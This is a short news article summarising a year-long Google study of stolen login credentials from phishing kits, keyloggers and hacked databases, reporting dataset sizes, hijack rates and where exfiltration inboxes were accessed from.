Google researchers and scientists have looked at the leaking of login data by phishing, hacked databases or keyloggers. Logins obtained through phishing pose the greatest risk to users.
The authors write on the basis of a case study with Google accounts that 7 percent of victims in a hacked database reveal their Google password in this way. That percentage rises to 12 percent for keyloggers and to 25 percent for phishing. In addition, the criminals behind phishing and keyloggers in most cases record the user’s IP address to facilitate use of the data. The study lasted a year and ran until March this year.
To conduct the study, the authors of the recently published paper used a dataset of 788,000 logins obtained by keyloggers, 12.4 million logins from phishing, and 1.9 billion logins from hacked databases. They obtained the dataset by building an automated tool that monitored open and closed forums, in addition to so-called paste sites and searches.
Method for collecting leaked login databases
Phishing logins were mapped using a dataset from an anonymous source with approximately 10,000 phishing kits and 3.8 million victims of these kits. Those php and html kits use a certain email address to send stolen logins to. By analyzing them and automatically flagging these types of emails, the researchers were able to arrive at a total of 12.4 million messages containing stolen data.
Method for collecting data on phishing kits and keyloggers
The research also shows that the phishing kits with the most victims masquerade as login portals of Yahoo, Hotmail or Gmail. This is followed by kits that focus on a work-related login environment. Below that are storage services such as Dropbox and Google Drive. Another finding was that, in the case of phishing kits and keyloggers, the so-called exfiltration points, i.e. the email addresses to which the stolen data were sent, were most often accessed from Nigeria. The US also ranks high in both categories.
Victims in different categories